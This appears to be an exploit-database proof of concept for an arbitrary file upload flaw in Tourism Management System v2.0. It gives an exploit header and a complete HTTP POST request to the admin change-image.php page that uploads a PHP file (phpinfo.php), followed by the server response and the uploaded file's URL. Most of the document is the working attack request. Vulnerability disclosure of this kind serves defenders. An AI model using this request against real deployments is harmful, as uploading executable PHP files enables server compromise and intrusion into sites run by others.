# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload # Google Dork: N/A # Exploit Author: SoSPiro # Date: 2024-02-18 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/tourism-management-system-free-download/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Allows admin to upload all files to the web server # CVE : N/A # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. # PoC request POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201 Content-Length: 361 Origin: http://localhost Connection: close Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1 Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-PwnFox-Color: red -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php" Content-Type: text/plain -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="submit" -----------------------------390927495111779706051786831201-- =========================================================================================== - Response - HTTP/1.1 200 OK Date: Sun, 18 Feb 2024 04:33:37 GMT Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev X-Powered-By: PHP/8.1.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8146 ============================================================================================ - File location - http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php